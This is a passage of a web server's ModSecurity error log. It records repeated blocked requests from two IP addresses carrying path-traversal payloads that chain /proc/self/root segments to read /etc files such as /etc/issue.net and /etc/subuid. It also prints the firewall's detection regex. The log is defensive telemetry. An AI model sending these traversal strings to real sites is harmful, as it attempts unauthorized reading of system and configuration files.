"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgGz7ABkC4fWIHEf8HfwQAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:09.665496 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:45552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG0XjZBu2q05ozVU9JBQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:12.119699 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:41664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG1BXjF1vJNtV6CWrsrwAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:14.440714 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:41670] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG1v9ocpUE4ed4uDzgxwAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:16.806610 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:41672] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG2P9ocpUE4ed4uDzgywAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:18.091055 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:41678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG2tSswJuvopo3lOhTQAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:19.426016 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:41688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG27ysWC90G-1nBrA5PAAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:22.993010 2026] [:error] [pid 21806:tid 140411649607424] [client 74.7.243.203:58900] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG3tSswJuvopo3lOhTRgAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:26.888641 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.243.203:58902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG4v9ocpUE4ed4uDzg1wAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:28.067722 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.241.46:49610] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG5P9ocpUE4ed4uDzg2gAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:34:28.202386 2026] [:error] [pid 11972:tid 140411649607424] [client 74.7.243.203:58904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG5Jqj1wV0Si-OkefdWQAAAAs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:31.039517 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:55472] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG55qj1wV0Si-OkefdWwAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:34:31.721835 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.243.203:58916] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG53jZBu2q05ozVU9JCAAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:34.187630 2026] [:error] [pid 21946:tid 140411540502272] [client 74.7.243.203:35062] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG6nbQATo66fKoS7xAngAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:35.619239 2026] [:error] [pid 21946:tid 140411658000128] [client 74.7.241.46:55478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG63bQATo66fKoS7xAoAAAAMo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:34:36.561338 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.243.203:35070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG7I6lpbStxTqkSktg8QAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:37.908211 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.243.203:35082] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG7XbQATo66fKoS7xAogAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:39.195391 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:35092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG7xXjF1vJNtV6CWrstQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:41.499584 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.243.203:59476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG8RXjF1vJNtV6CWrsuQAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:34:42.195560 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.241.46:55484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG8hXjF1vJNtV6CWrsugAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:43.568306 2026] [:error] [pid 21805:tid 140411641214720] [client 74.7.241.46:33168] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG87ABkC4fWIHEf8HfxQAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:34:44.015782 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.243.203:59488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgG9AlT9VtDQc7bgUygHwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
